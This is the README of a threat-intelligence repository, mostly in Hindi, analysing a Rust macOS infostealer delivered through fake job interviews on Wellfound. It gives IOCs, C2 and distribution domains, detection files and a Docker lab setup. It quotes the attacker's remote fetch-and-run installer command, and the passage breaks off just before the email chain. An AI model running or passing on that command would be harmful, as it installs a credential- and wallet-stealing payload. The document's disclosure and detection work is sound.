
पूर्ण स्थैतिक विश्लेषण HyperHives macOS Rust infostealer का — 571 डिक्रिप्टेड कॉन्फ़िग मान, C2 बुनियादी ढांचा, DPRK/Contagious Interview आरोपण, YARA/Sigma नियम, STIX 2.1 बंडल, ATT&CK Navigator परत
खतरा बुद्धिमत्ता: Rust-आधारित macOS यूनिवर्सल बाइनरी इन्फोस्टीलर जो Wellfound (पूर्व में AngelList) पर नकली नौकरी साक्षात्कार पाइपलाइन के माध्यम से वितरित किया गया। "HyperHive" से ऑपरेटर व्यक्तित्व "Felix" ने लक्ष्यों को
macos.hyperhives.netसे एक दुर्भावनापूर्ण इंस्टॉलर चलाने के लिए लालच दिया। यह रिपॉजिटरी पूर्ण स्थैतिक विश्लेषण दस्तावेज़ित करती है: 571 एन्क्रिप्टेड कॉन्फ़िगरेशन मान पुनर्प्राप्त किए गए, जिनमें C2 URL, एक Sentry DSN, और 276 लक्षित Chrome एक्सटेंशन आईडी शामिल हैं।
| नमूना SHA-256 | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| C2 डोमेन | cloudproxy.link |
| वितरण डोमेन | macos.hyperhives.net |
| लालच मंच | Wellfound (पूर्व में AngelList) |
| ऑपरेटर व्यक्तित्व | "HyperHive" पर "Felix" |
| वायरसटोटल | 9 / 63 डिटेक्शन |
| वर्गीकरण | सार्वजनिक प्रकटीकरण / IOC बंडल |
| अंतिम अद्यतन | अप्रैल 2026 |
| फ़ाइल | प्रारूप | उद्देश्य |
|---|---|---|
iocs.txt | सादा पाठ | हैश, डोमेन, URL, आईपी, ईमेल, Sentry ID — ब्लॉकलिस्ट, MISP, OpenCTI में पेस्ट करें |
yara_rules.yar | YARA 4.2+ | ज्ञात-नमूना हैश मिलान + Mach-O के लिए ह्यूरिस्टिक स्ट्रिंग डिटेक्शन |
sigma_rules.yml | Sigma | प्रॉक्सी, DNS, और प्रक्रिया-निर्माण नियम — अपने SIEM के लिए logsource ट्यून करें |
stix/bundle.json | STIX 2.1 | मशीन-पठनीय CTI बंडल जिसमें संकेतक, मैलवेयर SDO, बुनियादी ढांचा, ATT&CK पैटर्न और संबंध शामिल हैं |
attack-navigator-layer.json | ATT&CK Navigator | दृश्य तकनीक कवरेज के लिए ATT&CK Navigator में आयात करें |
. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist
---
## त्वरित आरंभ
नमूने को `sample/installer_binary` के रूप में रखें (हैश सत्यापन के लिए [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) देखें), फिर:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
The compose file enforces network_mode: none, read_only: true, and drops all Linux capabilities. See SECURITY.md for full handling guidelines.
A job posting on Wellfound (formerly AngelList) led to a multi-email social-engineering chain from an operator persona "Felix" at "HyperHive". After flattering the target's technical background and scheduling a fake interview, the attacker directed the victim to "review the product" at hyperhives.net and specifically examine Settings → Diagnostics → Log — a pretext to trigger execution of:```
curl -s https://macos.hyperhives.net/install | nohup bash &
पेलोड एक **8.5 MB का Mach-O यूनिवर्सल बाइनरी** (x86_64 + arm64) है, जिसे Rust में संकलित किया गया है। एक एयर-गैप्ड Docker लैब और **570 अद्वितीय x86_64 हेल्पर रूटीन** के CPU एमुलेशन के साथ स्टैटिक विश्लेषण ने **सभी 571 एन्क्रिप्टेड कॉन्फ़िगरेशन मान** पुनर्प्राप्त किए, जिससे यह उजागर हुआ:
- **C2:** `cloudproxy.link` — चार HTTPS एंडपॉइंट
- **Sentry (एट्रिब्यूशन पिवट):** `ingest.de.sentry.io` पर org/project आईडी के साथ पूर्ण DSN
- **बिल्ड पहचान:** Cargo उपयोगकर्ता `rootr`, कोडनेम `force`, संस्करण `9.12.1`
- **लक्ष्य:** 276 Chrome एक्सटेंशन आईडी (क्रिप्टो वॉलेट, पासवर्ड मैनेजर, कॉर्पोरेट क्रेडेंशियल)
रणनीति **DPRK-लिंक्ड Contagious Interview** अभियानों के अनुरूप है — वैध प्लेटफ़ॉर्म पर नकली नौकरी भर्ती, मल्टी-स्टेप विश्वास निर्माण, `curl | bash` डिलीवरी, Rust macOS स्टीलर, और क्रिप्टो-केंद्रित एक्सफ़िल्ट्रेशन।
---
## 1 — यह कैसे शुरू हुआ
### लालच: Wellfound पर नकली नौकरी साक्षात्कार
हमला **Wellfound (पूर्व में AngelList) पर एक वैध दिखने वाली नौकरी पोस्टिंग** से शुरू हुआ। लक्ष्य द्वारा आवेदन करने के बाद, "Felix" नामक व्यक्तित्व और "HyperHive" कंपनी नाम का उपयोग करने वाले एक ऑपरेटर से निम्नलिखित ईमेल श्रृंखला शुरू हुई: